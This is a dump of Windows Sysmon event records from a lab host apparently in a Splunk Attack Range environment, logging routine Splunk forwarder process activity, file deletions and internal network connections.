15:03:17.262{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.262{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-73B5-613B-4EB4-03000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.262{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-73B5-613B-4EB4-03000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.248{B81B27B7-73B5-613B-4EB4-03000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:17.062{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B81D043F88FFE43CDC156FA8BB194777,SHA256=5E4A059BC3248FF681D41C2EF609929EA24351D9024FE81627A525CAB47AADBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343164Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:18.314{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C29E9F16053BA8D2D0D4F0328C953149,SHA256=6B7DBAF0B3D7E12201F5AA1F5BE29D3AD1913642D888AD80116D9696AB77423E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:18.261{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9B0C643D887B3D00CD1514F94E99DE4,SHA256=F310A9BA9B3219826A344AAFAA6953A9D6F6D7F456DB55E47F85EAAF88B79FAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:18.261{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8CF8A063639EE6E5125ED1E169D646EC,SHA256=B2F92E02FD114F9054D0B8AB4D9E4D8A211EA00B0DA80075901FB59A998CC175,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:43.104{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52515-false10.0.1.12-8000- 354300x800000000000000035343160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:42.967{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52514-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343165Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:19.344{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C704437C41BB10743F43106A79EE227,SHA256=69E7E5D2FCEF581C105C530B69798CB8F72F3994F6D8DF4E911F75D82953D22D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343166Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:20.376{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10D116F3005BFBDFF7E07C706C9B5740,SHA256=C7FF3AAB71553C2864196C56F3B9A6B6AA4C520F2990FFA845444CD90F335107,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343167Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:21.396{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97AA9063AE07F82406CF04D7EEA7C1D1,SHA256=69ED54067AB64F4E77AFF261135153DB4DDAD3D831C4A030EF2E7CF8072F6A9C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343169Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:22.977{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=36A501C56AB529BD49D777CA827B59E9,SHA256=85216E7F1F7B27504E12DAB8435EC7890281B35892E3CA45621C1EB1E33BFA06,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343168Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:22.426{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A193EAEBDAA0D26524E9D7F8E0347BE3,SHA256=5DDFBB82B2226F6016680156B748560827530C8D0A86061EEE5316AD40885A62,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343172Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:23.476{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E51EBBD0CDF16CB1C714E1A3A731E98,SHA256=E82ECCB02AF145C64881B021B97F9FB75294E1A1F27BECEA687126D878C5FC08,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343171Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:48.161{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52516-false10.0.1.12-8000- 23542300x800000000000000035343170Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:23.126{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343174Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:24.494{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC85F70C1C092698F513051B231CCC5D,SHA256=6BA5DA35C8E493BE27A6A438CE81AAFFF1424D62E331A792A01F7C5E7F3BAE9E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343173Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:48.977{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52517-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343176Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:25.539{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB64C7294E05823B8B20129AA1646308,SHA256=7518F83648EBFE0C3D7FFF5A35657113CA3D9DA9E018662AD6310F0537291AFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343175Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:50.114{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52518-false10.0.1.12-8089- 23542300x800000000000000035343177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:26.572{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DC69F5B69F4F524C843154BEB2680E4,SHA256=D01E3EB86D51C023AA4696237781058D0787A18D1672CEE2E74A0070C075A212,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343179Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:27.590{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B65A3B56B50234987787754378734EAC,SHA256=497D99631B00C3EF52AC3487B0F0F550E7BFA3349DE4C99B7DCEFA83431B16BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:27.054{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F308197675E13518F5281D62E7561582,SHA256=F376A762738738BBE71B912DE258267A3036177189F39200EECB21020723BFDA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:28.605{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AECEDBC254B6C7C73513343E9D744E2,SHA256=001BB2FDF001E8484D9B09510857C973B15036C9C9D8B8617A626EA7AA90A6D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:52.997{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52519-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:29.620{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6F1CD31345D29CF1C3395610BB5FF5B,SHA256=EF9CC4B1B78F1F64DC60B60E937EEF290557B56F6DC245214F4446B414369F86,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:54.176{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52520-false10.0.1.12-8000- 23542300x800000000000000035343184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:30.650{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=295652A6B41EB027DB41B13FABB57DB8,SHA256=6634F2E9789A00D90F148A462CB5821788C3022DD3131CC7B4B47E46AA2A56CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.887{B81B27B7-73C3-613B-51B4-03000000C801}12846680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.703{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-73C3-613B-51B4-03000000C801}1284C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.703{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.703{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.703{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.703{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.703{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-73C3-613B-51B4-03000000C801}1284C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.703{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-73C3-613B-51B4-03000000C801}1284C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.689{B81B27B7-73C3-613B-51B4-03000000C801}1284C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.670{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77A63786C117E870DA7C97D445D36A7D,SHA256=2804F740B5E9AAA663F596D3E2C79567CE97EBBACA000F49EEA6169BB1F86803,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.219{B81B27B7-73C3-613B-50B4-03000000C801}67246796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:31.072{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-73C3-613B-50B4-03000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 